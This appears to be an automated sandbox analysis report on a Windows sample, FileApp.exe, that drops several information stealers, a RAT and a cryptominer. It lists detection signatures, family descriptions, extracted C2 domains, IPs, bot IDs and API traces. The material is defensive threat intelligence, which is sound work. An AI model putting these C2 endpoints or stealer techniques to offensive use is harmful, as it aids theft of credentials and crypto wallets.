Windows Analysis Report
FileApp.exe

Overview

General Information

Sample name: FileApp.exe
Analysis ID: 1504272
MD5: 84fb9da5b4879a284fe19a1635d9ee39
SHA1: 6e7156eb87e3e376ae128eb40e1cc365ad80467e
SHA256: 45bd836cdf29ad666cc785f6df5e9ff0e43e9cb63ff06aca339fdb1f3ddbfa34
Tags: exe, Tofsee

Detection

LummaC, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files to the document folder of the user
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Modifies power options to not sleep / hibernate
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted applications (PUAs) at once. So, there is a high probability that the XMRIG virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer capability which targets browser information and crypto wallets. It usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: stamppreewntnq.shop URL Reputation: Label: phishing
Source: condedqpwqm.shop URL Reputation: Label: phishing
Source: locatedblsoqp.shop URL Reputation: Label: phishing
Source: traineiwnqo.shop URL Reputation: Label: malware
Source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}
Source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199768374681", "https://t.me/edm0d"], "Botnet": "6eeb5dff1d479d082f77f2c9017c3bf5"}
Source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "147.45.47.36:30035", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "stamppreewntnq.shop", "locatedblsoqp.shop", "millyscroqwp.shop"], "Build id": "E6UHNR--"}
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe ReversingLabs: Detection: 66%
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe ReversingLabs: Detection: 87%
Source: C:\Users\userEHJKFCGHID.exe ReversingLabs: Detection: 66%
Source: C:\Users\userFBKKJEBFID.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe ReversingLabs: Detection: 34%
Source: FileApp.exe ReversingLabs: Detection: 23%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: caffegclasiqwp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: stamppreewntnq.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: stagedchheiqwo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: millyscroqwp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: evoliutwoqm.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: condedqpwqm.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: traineiwnqo.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: locatedblsoqp.shop
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp String decryptor: E6UHNR--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 22_2_00409BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 22_2_00418940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 22_2_0040C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 22_2_00407280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 22_2_00409B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 22_2_69C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 22_2_69C60180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C343B0 PK11_PubEncryptPKCS1,PR_SetError, 22_2_69C343B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 22_2_69C825B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C344C0 PK11_PubEncrypt, 22_2_69C344C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C34440 PK11_PrivDecrypt, 22_2_69C34440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 22_2_69C04420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 22_2_69C5A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 22_2_69C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 22_2_69C3A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C18670 PK11_ExportEncryptedPrivKeyInfo, 22_2_69C18670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C39840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 22_2_69C39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C33850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 22_2_69C33850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5DA40 SEC_PKCS7ContentIsEncrypted, 22_2_69C5DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C17D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 22_2_69C17D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 22_2_69C5BD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C57C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 22_2_69C57C00

Bitcoin Miner

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: FileApp.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.98:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.6:53024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:53035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.6:53045 version: TLS 1.2
Source: FileApp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdbI source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.PDB source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdb source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb(D source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Windows\exe\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HP.o<C:\Windows\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2563660175.00000000012F9000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_004062EB FindFirstFileW,FindClose, 14_2_004062EB
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 14_2_00406CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0040F4F0
